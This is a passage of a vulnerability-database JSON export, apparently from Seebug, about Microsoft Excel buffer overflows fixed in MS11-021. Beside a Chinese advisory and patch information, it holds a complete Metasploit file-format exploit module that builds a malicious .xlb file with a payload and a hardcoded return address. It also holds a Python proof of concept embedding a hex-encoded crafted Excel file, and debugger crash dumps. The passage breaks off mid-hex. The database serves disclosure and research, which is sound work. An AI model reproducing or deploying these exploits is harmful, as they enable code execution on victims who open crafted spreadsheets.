"AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "seebug": [{"lastseen": "2017-11-19T18:05:03", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 47226\r\nCVE ID: CVE-2011-0979\r\n\r\nMicrosoft Excel\u662f\u7531Microsoft\u4e3aWindows\u548cApple Macintosh\u64cd\u4f5c\u7cfb\u7edf\u7684\u7535\u8111\u800c\u7f16\u5199\u548c\u8fd0\u884c\u7684\u4e00\u6b3e\u8bd5\u7b97\u8868\u8f6f\u4ef6\u3002\r\n\r\nMicrosoft Excel\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u4ee5\u5f53\u524d\u7528\u6237\u6743\u9650\u6267\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u9020\u6210\u62d2\u7edd\u670d\u52a1\u3002\r\n\r\nMicrosoft Office Excel\u5904\u7406\u7279\u5236Excel\u6587\u4ef6\u7684\u65b9\u5f0f\u4e2d\u5b58\u5728\u4e00\u4e2a\u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\u6f0f\u6d1e\uff0c\u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u7684\u653b\u51fb\u8005\u4fbf\u53ef\u5b8c\u5168\u63a7\u5236\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u3002\u653b\u51fb\u8005\u53ef\u968f\u540e\u5b89\u88c5\u7a0b\u5e8f\uff1b\u67e5\u770b\u3001\u66f4\u6539\u6216\u5220\u9664\u6570\u636e\uff1b\u6216\u8005\u521b\u5efa\u62e5\u6709\u5b8c\u5168\u7528\u6237\u6743\u9650\u7684\u65b0\u5e10\u6237\n\nMicrosoft Excel\r\nMicrosoft Office\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u4f7f\u7528\u201cMicrosoft Office\u6587\u4ef6\u963b\u6b62\u201d\u7b56\u7565\u7981\u6b62\u5728Excel\u4e2d\u6253\u5f00\u6765\u81ea\u4e0d\u53ef\u4fe1\u4efb\u6765\u6e90\u548c\u4f4d\u7f6e\u7684Office 2003\u548c\u65e9\u671f\u7248\u672c\u7684\u6587\u4ef6\u3002\r\n\r\n* \u5728\u6253\u5f00\u672a\u77e5\u6216\u53ef\u7591\u6e90\u7684\u6587\u4ef6\u65f6\u4f7f\u7528MOICE\r\n \r\n* \u4e0d\u8981\u6253\u5f00\u6765\u81ea\u53ef\u7591\u6e90\u7684Office\u6587\u4ef6\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS11-021\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\n\r\nMS11-021\uff1aVulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2489279)\r\n\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/bulletin/MS11-021.asp", "modified": "2011-04-15T00:00:00", "published": "2011-04-15T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20487", "id": "SSV:20487", "title": "Microsoft Excel Office Art\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(MS11-021)", "type": "seebug", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T15:12:20", "bulletinFamily": "exploit", "description": "No description provided by source.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-72308", "id": "SSV:72308", "title": "MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow", "type": "seebug", "sourceData": "\n ##\r\n# $Id: ms11_021_xlb_bof.rb 14172 2011-11-06 20:16:34Z sinn3r $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::FILEFORMAT\r\n\r\n\tdef initialize(info={})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => "MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow",\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability found in Excel of Microsoft Office 2007.\r\n\t\t\t\tBy supplying a malformed .xlb file, an attacker can control the content (source)\r\n\t\t\t\tof a memcpy routine, and the number of bytes to copy, therefore causing a stack-\r\n\t\t\t\tbased buffer overflow. This results aribrary code execution under the context of\r\n\t\t\t\tuser the user.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => "$Revision: 14172 $",\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Aniway', #Initial discovery (via ZDI)\r\n\t\t\t\t\t'abysssec', #RCA, poc\r\n\t\t\t\t\t'sinn3r', #Metasploit\r\n\t\t\t\t\t'juan vazquez' #Metasploit\r\n\t\t\t\t],\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2011-0105'],\r\n\t\t\t\t\t['MSB', 'MS11-021'],\r\n\t\t\t\t\t['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-121/'],\r\n\t\t\t\t\t['URL', 'http://www.abysssec.com/blog/2011/11/02/microsoft-excel-2007-sp2-buffer-overwrite-vulnerability-ba-exploit-ms11-021/']\r\n\t\t\t\t],\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t},\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'ExitFunction' => "process",\r\n\t\t\t\t\t'DisablePayloadHandler' => 'true',\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# Win XP SP3 (Vista and 7 will try to repair the file)\r\n\t\t\t\t\t['Microsoft Office Excel 2007 on Windows XP', {'Ret' => 0x3006A48D }], # JMP ESP in EXCEL (Office 2007)\r\n\t\t\t\t\t['Microsoft Office Excel 2007 SP2 on Windows XP', {'Ret'=>0x3006b185}], #JMP ESP in excel\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'DisclosureDate' => "Aug 9 2011",\r\n\t\t\t'DefaultTarget' => 0))\r\n\r\n\t\t\tregister_options(\r\n\t\t\t\t[\r\n\t\t\t\t\tOptString.new('FILENAME', [true, 'The filename', 'msf.xlb'])\r\n\t\t\t\t], self.class)\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tpath = File.join(Msf::Config.install_root, 'data', 'exploits', 'CVE-2011-0105.xlb')\r\n\t\tf = File.open(path, 'rb')\r\n\t\ttemplate = f.read\r\n\t\tf.close\r\n\r\n\t\tp = payload.encoded\r\n\r\n\t\t# Offset 1556\r\n\t\trecord = ''\r\n\t\trecord << "\\xa7\\x00" #record type\r\n\t\trecord << "\\x04\\x00" #record length\r\n\t\tif target.name =~ /Excel 2007 SP2/ # Microsoft Office Excel 2007 SP2\r\n\t\t\trecord << "\\xb0\\x0d\\x0c\\x00" #data\r\n\t\telse\r\n\t\t\trecord << "\\xb0\\x0f\\x0c\\x00" #data\r\n\t\tend\r\n\r\n\t\t# Offset 1564\r\n\t\tcontinue_record = ''\r\n\t\tcontinue_record << "\\x3c\\x00" #record type\r\n\t\tcontinue_record << [p.length+32].pack('v') #length\r\n\r\n\t\tbuf = ''\r\n\t\tbuf << template[0, 1556]\r\n\t\tbuf << record\r\n\t\tbuf << continue_record\r\n\t\tbuf << rand_text_alpha(1)\r\n\t\tbuf << [target.ret].pack('V*')\r\n\t\tbuf << "\\x00"*12\r\n\t\tbuf << p\r\n\t\tbuf << template[2336, template.length]\r\n\r\n\t\tfile_create(buf)\r\n\tend\r\nend\r\n\r\n=begin\r\n0:000> r\r\neax=41414141 ebx=00000000 ecx=00000006 edx=008c1504 esi=0000007f edi=00000005\r\neip=301a263d esp=00137ef8 ebp=00137f6c iopl=0 nv up ei pl nz na pe nc\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\r\nEXCEL!Ordinal40+0x1a263d:\r\n301a263d 8908 mov dword ptr [eax],ecx ds:0023:41414141=????????\r\n0:000> dc esp\r\n00137ef8 00000000 00000000 41414141 41414141 ........AAAAAAAA\r\n00137f08 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\r\n00137f18 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\r\n00137f28 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\r\n00137f38 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\r\n00137f48 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\r\n00137f58 41414141 41414141 41414141 00000000 AAAAAAAAAAAA....\r\n00137f68 41414141 41414141 41414141 41414141 AAAAAAAAAAAAAAAA\r\n=end\r\n\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-72308"}, {"lastseen": "2017-11-19T18:04:29", "bulletinFamily": "exploit", "description": "\u5fae\u8f6fExcel\u4e2d\u5f88\u5bb9\u6613\u51fa\u73b0\u4e00\u4e2a\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff0c\u56e0\u4e3a\u6ca1\u6709\u8db3\u591f\u7684\u5e94\u7528\u7a0b\u5e8f\u9a8c\u8bc1\u7528\u6237\u63d0\u4f9b\u7684\u8f93\u5165\u3002\r\n\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u901a\u8fc7\u8bf1\u4f7f\u4e0d\u77e5\u60c5\u7684\u7528\u6237\u6253\u5f00\u7279\u5236\u7684Excel\u6587\u4ef6\u8fd9\u4e2a\u95ee\u9898\u3002 \r\n\u6210\u529f\u7684\u653b\u51fb\u53ef\u4ee5\u8ba9\u653b\u51fb\u8005\u6267\u884c\u4e0e\u6b63\u5728\u8fd0\u884c\u7684\u5e94\u7528\u7a0b\u5e8f\u7528\u6237\u7684\u6743\u9650\u6267\u884c\u4efb\u610f\u4ee3\u7801\u3002\u65e0\u6cd5\u5229\u7528\u4f01\u56fe\u5c06\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u6761\u4ef6\u3002\n\nMicrosoft Excel 2010 0\r\nMicrosoft Excel 2007 SP2\r\nMicrosoft Excel 2007 SP1\r\nMicrosoft Excel 2007 0\r\nMicrosoft Excel 2003 SP3\r\nMicrosoft Excel 2003 SP2\r\nMicrosoft Excel 2003 SP1\r\n+ Microsoft Office 2003 SP1\r\nMicrosoft Excel 2003 \r\n+ Microsoft Office 2003 0\r\nMicrosoft Excel 2002 SP3\r\n+ Microsoft Office XP SP3\r\nMicrosoft Excel 2002 SP2\r\n+ Microsoft Office XP SP2\r\n- Microsoft Windows 2000 Professional SP3\r\n- Microsoft Windows 2000 Professional SP2\r\n- Microsoft Windows 2000 Professional SP1\r\n- Microsoft Windows 2000 Professional \r\n- Microsoft Windows 98 \r\n- Microsoft Windows 98SE \r\n- Microsoft Windows ME \r\n- Microsoft Windows NT Workstation 4.0 SP6a\r\n- Microsoft Windows NT Workstation 4.0 SP6\r\n- Microsoft Windows NT Workstation 4.0 SP5\r\n- Microsoft Windows NT Workstation 4.0 SP4\r\n- Microsoft Windows NT Workstation 4.0 SP3\r\n- Microsoft Windows NT Workstation 4.0 SP2\r\n- Microsoft Windows NT Workstation 4.0 SP1\r\n- Microsoft Windows NT Workstation 4.0\r\n- Microsoft Windows XP Home SP1\r\n- Microsoft Windows XP Home \r\n- Microsoft Windows XP Professional SP1\r\n- Microsoft Windows XP Professional \r\nMicrosoft Excel 2002 SP1\r\n+ Microsoft Office XP SP1\r\n- Microsoft Windows 2000 Advanced Server SP2\r\n- Microsoft Windows 2000 Advanced Server SP1\r\n- Microsoft Windows 2000 Advanced Server \r\n- Microsoft Windows 2000 Datacenter Server SP2\r\n- Microsoft Windows 2000 Datacenter Server SP1\r\n- Microsoft Windows 2000 Datacenter Server \r\n- Microsoft Windows 2000 Professional SP2\r\n- Microsoft Windows 2000 Professional SP1\r\n- Microsoft Windows 2000 Professional \r\n- Microsoft Windows 2000 Server SP2\r\n- Microsoft Windows 2000 Server SP1\r\n- Microsoft Windows 2000 Server \r\n- Microsoft Windows 2000 Terminal Services SP2\r\n- Microsoft Windows 2000 Terminal Services SP1\r\n- Microsoft Windows 2000 Terminal Services \r\n- Microsoft Windows 98 \r\n- Microsoft Windows 98SE \r\n- Microsoft Windows ME \r\n- Microsoft Windows NT Enterprise Server 4.0 SP6a\r\n- Microsoft Windows NT Enterprise Server 4.0 SP6\r\n- Microsoft Windows NT Enterprise Server 4.0 SP5\r\n- Microsoft Windows NT Enterprise Server 4.0 SP4\r\n- Microsoft Windows NT Enterprise Server 4.0 SP3\r\n- Microsoft Windows NT Enterprise Server 4.0 SP2\r\n- Microsoft Windows NT Enterprise Server 4.0 SP1\r\n- Microsoft Windows NT Enterprise Server 4.0\r\n- Microsoft Windows NT Server 4.0 SP6a\r\n- Microsoft Windows NT Server 4.0 SP6\r\n- Microsoft Windows NT Server 4.0 SP5\r\n- Microsoft Windows NT Server 4.0 SP4\r\n- Microsoft Windows NT Server 4.0 SP3\r\n- Microsoft Windows NT Server 4.0 SP2\r\n- Microsoft Windows NT Server 4.0 SP1\r\n- Microsoft Windows NT Server 4.0\r\n- Microsoft Windows NT Terminal Server 4.0 SP6\r\n- Microsoft Windows NT Terminal Server 4.0 SP5\r\n- Microsoft Windows NT Terminal Server 4.0 SP4\r\n- Microsoft Windows NT Terminal Server 4.0 SP3\r\n- Microsoft Windows NT Terminal Server 4.0 SP2\r\n- Microsoft Windows NT Terminal Server 4.0 SP1\r\n- Microsoft Windows NT Terminal Server 4.0\r\n- Microsoft Windows NT Workstation 4.0 SP6a\r\n- Microsoft Windows NT Workstation 4.0 SP6\r\n- Microsoft Windows NT Workstation 4.0 SP5\r\n- Microsoft Windows NT Workstation 4.0 SP4\r\n- Microsoft Windows NT Workstation 4.0 SP3\r\n- Microsoft Windows NT Workstation 4.0 SP2\r\n- Microsoft Windows NT Workstation 4.0 SP1\r\n- Microsoft Windows NT Workstation 4.0\r\n- Microsoft Windows XP Home \r\n- Microsoft Windows XP Professional \r\nMicrosoft Excel 2002 \r\n+ Microsoft Office XP \r\n- Microsoft Windows 2000 Professional SP2\r\n- Microsoft Windows 2000 Professional SP1\r\n- Microsoft Windows 2000 Professional \r\n- Microsoft Windows 95 SR2\r\n- Microsoft Windows 95 \r\n- Microsoft Windows 98 \r\n- Microsoft Windows 98SE \r\n- Microsoft Windows ME \r\n- Microsoft Windows NT 4.0 SP6a\r\n- Microsoft Windows NT 4.0 SP5\r\n- Microsoft Windows NT 4.0 SP4\r\n- Microsoft Windows NT 4.0 SP3\r\n- Microsoft Windows NT 4.0 SP2\r\n- Microsoft Windows NT 4.0 SP1\r\n- Microsoft Windows NT 4.0\n\u76ee\u524d\u5382\u5546\u8fd8\u6ca1\u6709\u63d0\u4f9b\u8865\u4e01", "modified": "2011-05-01T00:00:00", "published": "2011-05-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20502", "id": "SSV:20502", "title": "Microsoft Excel Axis\u5c5e\u6027\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "type": "seebug", "sourceData": "\n """\r\nThis is a PoC for MS11-021/CVE-2011-0978\r\nMicrosoft Office Excel Axis Properties Record Parsing Buffer Overflow\r\nck@leehoosoftware.org\r\nhttp://user.qzone.qq.com/2133529/\r\n \r\nModify bits at file location 0x39E7\r\n \r\n0:000:x86> r\r\neax=04dd6380 ebx=ffff5554 ecx=04ab5108 edx=00000000 esi=04ab4800 edi=ffff5554\r\neip=2f36a2fd esp=0021420c ebp=00214218 iopl=0 nv up ei pl zr na pe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246\r\n2f36a2d5 33d2 xor edx,edx\r\n2f36a2d7 53 push ebx\r\n2f36a2d8 8b5d18 mov ebx,dword ptr [ebp+18h]\r\n2f36a2db 891540cdfc2f mov dword ptr [EXCEL!DllGetLCID+0x32517 (2ffccd40)],edx\r\n2f36a2e1 3b580c cmp ebx,dword ptr [eax+0Ch]\r\n2f36a2e4 0f8d8e9c1a00 jge EXCEL!Ordinal40+0x423f78 (2f513f78)\r\n2f36a2ea 39551c cmp dword ptr [ebp+1Ch],edx\r\n2f36a2ed 56 push esi\r\n2f36a2ee 57 push edi\r\n2f36a2ef 0f84a09c1a00 je EXCEL!Ordinal40+0x423f95 (2f513f95)\r\n2f36a2f5 395514 cmp dword ptr [ebp+14h],edx\r\n2f36a2f8 7f27 jg EXCEL!Ordinal40+0x27a321 (2f36a321)\r\n2f36a2fa 8b4010 mov eax,dword ptr [eax+10h]\r\n2f36a2fd 8b0498 mov eax,dword ptr [eax+ebx*4] ds:002b:04dab8d0=????????\r\n2f36a300 3bc2 cmp eax,edx\r\n2f36a302 7425 je EXCEL!Ordinal40+0x27a329 (2f36a329)\r\n2f36a304 0fb738 movzx edi,word ptr [eax]\r\n2f36a307 8d4c3f02 lea ecx,[edi+edi+2]\r\n2f36a30b 51 push ecx\r\neax here points to location in the file 0xFB4.\r\n0:000:x86> dd eax\r\n04dd6380 0376ec80 04dd02b0 04dd0330 04dd0318\r\n04dd6390 04dd0380 04dd0398 04dd03b0 04dd03c8\r\n04dd63a0 04dd03e0 00000000 00000001 00000001\r\n04dd63b0 00000001 00000001 00000001 00000001\r\n04dd63c0 00000001 00000001 00000001 00000000\r\n04dd63d0 00000000 00000000 00000000 00000000\r\n04dd63e0 00000000 00000000 00000000 00000000\r\n04dd63f0 00000000 00000000 00000000 00000000\r\n0:000:x86> dd 0376ec80\r\n0376ec80 00630009 0061006c 00730073 006f0077\r\n0376ec90 006b0072 eaf10000 00770009 00720061\r\n0376eca0 0075006d 00200070 00350023 eaf10000\r\n0376ecb0 0283eb30 6666ce60 0283eb40 6666c960\r\n0376ecc0 0283eb4c 6666c960 0000f80c 00000000\r\n0376ecd0 00006338 00000000 00000001 00000000\r\n0376ece0 0283eb98 6666ce60 0283eba4 6666c960\r\n0376ecf0 0283ebb0 6666c960 00000000 00000000\r\n \r\nwebDEViL\r\n"""\r\nimport binascii\r\n \r\n \r\nwD="d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff090006000000000"\r\nwD+="000000000000001000000540000000000000000100000feffffff00000000feffffff000000"\r\nwD+="0053000000fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffff0908100000060500e228cd07c9"\r\nwD+="c0000006020000e1000200b004c10002000000e20000005c0070000800004e49492d54524c5"\r\nwD+="420202020202020202020202020202020202020202020202020202020202020202020202020"\r\nwD+="202020202020202020202020202020202020202020202020202020202020202020202020202"\r\nwD+="0202020202020202020202020202020202020202020202020202042000200b0046101020000"\r\nwD+="00c00100003d011000010002000300040005000600090008009c0002000e001900020000001"\r\nwD+="20002000000130002000000af0102000000bc01020000003d001200e7fa2c013e2b2d1e3800"\r\nwD+="00000000010058024000020000008d00020000002200020000000e0002000100b7010200000"\r\nwD+="0da000200000031001a00c8000000ff7f9001000000000000050141007200690061006c0031"\r\nwD+="001a00c8000000ff7f9001000000000000050141007200690061006c0031001a00c8000000f"\r\nwD+="f7f9001000000000000050141007200690061006c0031001a00c8000000ff7f900100000000"\r\nwD+="0000050141007200690061006c0031001a00a0000000ff7f900100000000000005014100720"\r\nwD+="0690061006c0031001a00c80004000c009001000001000000050141007200690061006c0031"\r\nwD+="001a00c800040024009001000001000000050141007200690061006c0031001c00a0000000f"\r\nwD+="f7f900100000002000006015400610068006f006d00610031001a00dc000000ff7f90010000"\r\nwD+="00020000050141007200690061006c0031001a009a010000ff7f90010000000000000501410"\r\nwD+="07200690061006c0031001a009a010000ff7f9001000000000000050141007200690061006c"\r\nwD+="0031001a0022010000ff7f9001000000020000050141007200690061006c0031001a00bd010"\r\nwD+="000ff7f9001000000000000050141007200690061006c0031001a00bd010000ff7f90010000"\r\nwD+="00000000050141007200690061006c0031001a00c80001000a00bc020000000200000501410"\r\nwD+="07200690061006c0031001a00a0000000ff7f9001000000020000050141007200690061006c"\r\nwD+="0031001a00c80000000a009001000000020000050141007200690061006c0031001a00c8000"\r\nwD+="0000c009001000000020000050141007200690061006c0031001a00c8000100ff7fbc020000"\r\nwD+="00020000050141007200690061006c0031001a00c80001000900bc020000000200000501410"\r\nwD+="07200690061006c001e041c000500170000222422232c2323305f293b5c28222422232c2323"\r\nwD+="305c291e04210006001c0000222422232c2323305f293b5b5265645d5c28222422232c23233"\r\nwD+="05c291e04220007001d0000222422232c2323302e30305f293b5c28222422232c2323302e30"\r\nwD+="305c291e0427000800220000222422232c2323302e30305f293b5b5265645d5c28222422232"\r\nwD+="c2323302e30305c291e0437002a003200005f282224222a20232c2323305f293b5f28222422"\r\nwD+="2a205c28232c2323305c293b5f282224222a20222d225f293b5f28405f291e042e002900290"\r\nwD+="0005f282a20232c2323305f293b5f282a205c28232c2323305c293b5f282a20222d225f293b"\r\nwD+="5f28405f291e043f002c003a00005f282224222a20232c2323302e30305f293b5f282224222"\r\nwD+="a205c28232c2323302e30305c293b5f282224222a20222d223f3f5f293b5f28405f291e0436"\r\nwD+="002b003100005f282a20232c2323302e30305f293b5f282a205c28232c2323302e30305c293"\r\nwD+="b5f282a20222d223f3f5f293b5f28405f291e040b00a400060000302e303030301e040a00a5"\r\nwD+="00050000302e3030301e040800a600030000302e30e000140000000000f5ff2000000000000"\r\nwD+="00000000000c020e000140001000000f5ff200000f40000000000000000c020e00014000100"\r\nwD+="0000f5ff200000f40000000000000000c020e000140002000000f5ff200000f400000000000"\r\nwD+="00000c020e000140002000000f5ff200000f40000000000000000c020e000140000000000f5"\r\nwD+="ff200000f40000000000000000c020e000140000000000f5ff200000f40000000000000000c"\r\nwD+="020e000140000000000f5ff200000f40000000000000000c020e000140000000000f5ff2000"\r\nwD+="00f40000000000000000c020e000140000000000f5ff200000f40000000000000000c020e00"\r\nwD+="0140000000000f5ff200000f40000000000000000c020e000140000000000f5ff200000f400"\r\nwD+="00000000000000c020e000140000000000f5ff200000f40000000000000000c020e00014000"\r\nwD+="0000000f5ff200000f40000000000000000c020e000140000000000f5ff200000f400000000"\r\nwD+="00000000c020e0001400000000000100200000000000000000000000c020e000140001002b0"\r\nwD+="0f5ff200000f80000000000000000c020e000140001002900f5ff200000f800000000000000"\r\nwD+="00c020e000140001002c00f5ff200000f80000000000000000c020e000140001002a00f5ff2"\r\nwD+="00000f80000000000000000c020e000140007000000f4ff000000f40000000000000000c020"\r\nwD+="e000140006000000f4ff000000f40000000000000000c020e000140001000900f5ff200000f"\r\nwD+="80000000000000000c020e0001400000001000100200000040000000000000000c020e00014"\r\nwD+="000000000001002000006011114020402000040d20e00014000000010001002000006411114"\r\nwD+="020402000040d20e00014000000000001002000006011114020402000040f20e00014000000"\r\nwD+="010001002000006411114020402000040f20e00014000f00000001002000006811114020402"\r\nwD+="000041620e00014000f00010001002000006c11114020402000041620e00014000000000001"\r\nwD+="00200000201111402040200000c020e00014000000000001002000006011114020402000041"\r\nwD+="620e00014001400000001002000006811114020402000040a20e00014000f00000001002000"\r\nwD+="00080000000000000000c0eeee001400130000000100200000080000000000000000c020e00"\r\nwD+="01400000000000000200000e011114020402000040f20e0001400000000000000200000e011"\r\nwD+="114020402000040d20e0001400000000000000200000800000000000000000c020e00014000"\r\nwD+="00001000000200000840000000000000000c020e0001400140001000000200000ec11114020"\r\nwD+="402000040a2093020400108003ff93020400118006ff93020400128004ff93020400138007f"\r\nwD+="f93020400148009ff93020400158008ff93020400008000ff93020400168005ff6001020000"\r\nwD+="0085000b00c710000000000300616c6c85000a003a22000000000200637785000a00893f000"\r\nwD+="000000200687785000c0010580000000004007175697a85000c006764000000000400746573"\r\nwD+="7485000c00ac6f00000000040073746174850011001e80000000000900646576696174696f6"\r\nwD+="e8500110029830000000009006176672067726170688c00040001000100ae01040008000104"\r\nwD+="170020000500000001000100000002000200000003000300000004000400000000000000180"\r\nwD+="01b00210000010b000000010000000000000d3b040001001f000100010018001b0021000001"\r\nwD+="0b000000020000000000000d3b000001001f000100010018001b00210000010b00000003000"\r\nwD+="0000000000d3b010001001f000100010018001b00210000010b000000040000000000000d3b"\r\nwD+="020001001f000100010018001b00210000010b000000050000000000000d3b030001001f000"\r\nwD+="1000100c1010800c1010000548d0100eb0082000f0000f07a000000000006f040000000011c"\r\nwD+="000007000000180000000600000002000000050000000300000004000000040000000300000"\r\nwD+="00500000002000000010000000b000000060000000600000033000bf012000000bf00080008"\r\nwD+="00810141000008c0014000000840001ef1100000000b0000080c00000817000008f7000010f"\r\nwD+="c002f059d010000660000000400005441534b08000043415445474f52590500004752414445"\r\nwD+="160000312f32392c20333020502e203439322c2050203530320d0000382e3620382e3720736"\r\nwD+="86565741f0000312f3330205175697a2032206f6e20726174657320616e6420726174696f73"\r\nwD+="130000312f333120322f312043682054657374204120120000322f312c3220702e203531362"\r\nwD+="02d203531381400006368203720616e642037206e746220636865636b080000686f6d65776f"\r\nwD+="726b090000636c617373776f726b0400007175697a0400007465737418000073696d696c617"\r\nwD+="220747269616e676c6573207061636b65740900006368203820746573740f000070726f6a65"\r\nwD+="6374206f75746c696e650c0000636f6f6c20646f776e20233511000070726f6772657373207"\r\nwD+="3686565742023371000007765656b6c79207265766965772031351000007765656b6c792072"\r\nwD+="6576696577203136110000547269676f6e6f6d657472792054657374140000322f362c20372"\r\nwD+="0702e203739392023312d323520100000702e203533312035333820322f382c39170000392e"\r\nwD+="3320392e34207079746861676f7265616e2074686d1000007765656b6c79207265766965772"\r\nwD+="031340d000054726967205477697374657220130000322f32372c3238204d61746820412074"\r\nwD+="657374150000332f312c3220776b7368742031302e312f31302e361000007765656b6c79207"\r\nwD+="26576696577203137140000547269676f6e6f6d657472792050726f6a6563740c00006c6f63"\r\nwD+="7573207061636b65740b0000436972636c65207175697a1f0000332f372c382031312e31206"\r\nwD+="e6f74657320616e6420707261632041207368740d000050415254494349504154494f4e0d00"\r\nwD+="0070617274696369706174696f6e0900007761726d75702023350d000050617274696369706"\r\nwD+="174696f6e090000436c617373776f726b080000486f6d65776f726b0500005175697a200400"\r\nwD+="00546573740d000046696e616c20617665726167650600006f7574206f66060000677261706"\r\nwD+="820050000477261646508000053747564656e74731900004879706f746865746963616c2063"\r\nwD+="6c617373206772616465730400006d65616e0700006d656469616e200400006d6f646506000"\r\nwD+="06d656469616e08000057656967687465640800004176657261676573080000526567756c61"\r\nwD+="722008000043617465676f72790400005175697a160000496e73657274207175697a2067726"\r\nwD+="170682068657265160000496e73657274207465737420677261706820686572650500005465"\r\nwD+="7374200d00003f20496e73657274206865726504000050757420050000796f7572200300006"\r\nwD+="f662009000063617465676f7279200800006176657261676573050000686572652004000028"\r\nwD+="6e6f74090000776569676874656420080000617665726167652908000063772067726164650"\r\nwD+="a000046696e616c204176672e0400004d65616e08000056617269616e636508000053742e20"\r\nwD+="4465762e0700005a2d53636f72650600004d656469616e03000056617205000053744465760"\r\nwD+="600005a73636f72650300004d656405000074686973200500007061737465040000616c6c20"\r\nwD+="060000677261646573040000686572650500006a757374200700006e756d626572730700006"\r\nwD+="66967757265200400006f757420040000686f7720030000746f20040000736f727406000073"\r\nwD+="742064657608000076617269616e63650700007a2d73636f726505000070616765200500007"\r\nwD+="7696c6c20070000616e7377657220020000612007000070726f6a6563740c00007072657365"\r\nwD+="6e746174696f6e0800007175657374696f6eff006a000800150b00000c000000a50b00009c0"\r\nwD+="000001a0c000011010000bb0c0000b2010000530d00004a020000d00d0000c70200002f0e00"\r\nwD+="00260300007c0e000073030000e70e0000de030000370f00002e0400007d0f000074040000c"\r\nwD+="00f0000b704000001100000f804000063081500630800000000000000000000150000000002"\r\nwD+="0000d20a0000000908100000061000e228cd07c9c00000060200000b021